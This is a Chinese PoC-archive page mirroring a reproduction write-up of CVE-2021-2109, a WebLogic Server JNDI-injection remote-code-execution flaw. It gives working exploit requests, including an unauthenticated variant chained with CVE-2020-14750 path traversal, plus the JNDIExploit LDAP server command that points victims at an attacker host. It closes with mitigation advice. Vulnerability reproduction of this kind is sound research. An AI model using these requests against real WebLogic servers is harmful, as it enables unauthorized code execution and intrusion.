支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: c3ab3638cc333cdf1d90deb75af946f3cd2fa7c2

来源
https://github.com/rabbitsafe/CVE-2021-2109
关联漏洞
标题:Oracle Fusion Middleware 组件访问控制错误漏洞 (CVE-2021-2109)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware 的 Oracle WebLogic Server 组件存在访问控制错误漏洞,该漏洞允许通过HTTP进行网络访问的高特权攻击者入侵Oracle WebLogic Server。以下产品及版本受到影响
介绍
CVE-2021-2109 Weblogic Server远程代码执行漏洞复现及分析

2021年1月Oracle发布了安全更新补丁,包含Oracle产品系列中的329个新安全补丁。此次公告中特别提到了,2020年11月1日发布的Oracle WebLogic Server关于CVE-2020-14750漏洞的安全公告。强烈建议客户应用此补丁更新,及此公告中的其他补丁。CVE编号CVE-2021-2109,该漏洞为Weblogic 的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

影响版本如下:
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0

一、CVE-2021-2109 Weblogic Server远程代码执行漏洞复现

使用DOCKER搭建Weblogic Server测试环境,Weblogic Server可以正常访问
![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/1.png)

1、正常登录后台的情况下进行JNDI注入
第一种情况,需要利用管理员帐号登录Weblogic Server后台,通过BurpSuite抓取登录数据包,获取登录Cookie数据

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/2.png)

在本机启动启动LDAP,可在https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11下载,命令如下:
java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/3.png)

发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包:
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/4.png)
 
通过cmd变量执行ipconfig系统命令

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/5.png)


2、配合Weblogic Server未授权访问后台进行JNDI注入
第二种情况,不需要登录Weblogic Server后台。
需配合Weblogic Server CVE-2020-14750未授权访问漏洞,发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包:
POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/6.png)

通过cmd变量执行calc.exe,打开系统计算器

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/7.png)

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/8.png)

系统计算器被打开

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/9.png)


二、CVE-2021-2109 Weblogic Server远程代码执行漏洞安全建议
1、禁用T3协议
如果您不依赖T3协议进行JVM通信,可通过暂时阻断T3协议缓解此漏洞带来的影响。
1). 进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。
2). 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s。

2、禁止启用IIOP
登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效

3、临时关闭后台/console/console.portal对外访问

4、升级官方安全补丁
文件快照

 [4.0K]  /data/pocs/c3ab3638cc333cdf1d90deb75af946f3cd2fa7c2
├── [ 29K]  1.png
├── [ 48K]  2.png
├── [ 15K]  3.png
├── [ 92K]  4.png
├── [ 38K]  5.png
├── [ 98K]  6.png
├── [ 92K]  7.png
├── [ 98K]  8.png
├── [101K]  9.png
├── [3.4K]  README.md
└── [3.3K]  Weblogic-CVE-2021-2109.py

0 directories, 11 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。